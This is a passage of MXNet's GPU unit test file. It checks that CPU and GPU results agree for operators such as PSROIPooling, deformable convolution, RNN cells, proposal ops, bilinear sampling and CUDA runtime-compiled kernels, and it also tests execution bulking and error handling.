prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
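# Reading of the mx.rtc launch calls above (drawn from this test, not a full API reference):
# kernel.launch(args, ctx, grid_dims, block_dims[, shared_mem]) takes the kernel arguments,
# the device context, (x, y, z) grid and block dimension tuples, and an optional final
# argument sizing the dynamically allocated shared memory backing the `extern __shared__`
# declaration. For example, the last call runs 2 blocks of 5 threads each.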
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
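# The assertion above relies on autograd recording the copyto() context hops: the gradient
# of tanh applied three times while bouncing between CPU and GPU should equal the gradient
# of the same three tanh calls executed on a single context.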
@with_seed()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% guarantee with NMS
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
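# The bilinear sampler check above compares three executors of the same graph, namely the
# CPU implementation, the GPU implementation with cudnn_off=True and the default (cuDNN)
# GPU path, using the CPU run as reference and covering grad_req 'write', 'add' and a
# 'write'/'null' mixture.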
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
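# The helper above chains 1000 flip ops on a tiny tensor so that per-operator engine
# overhead dominates the measured time; test_bulking() below reruns it under different
# MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD/BWD settings to verify that operator bulking
# actually reduces that overhead.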
@with_seed()
@unittest.skip('skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@unittest.skip('skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip the test since this python version can't run it properly; a warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
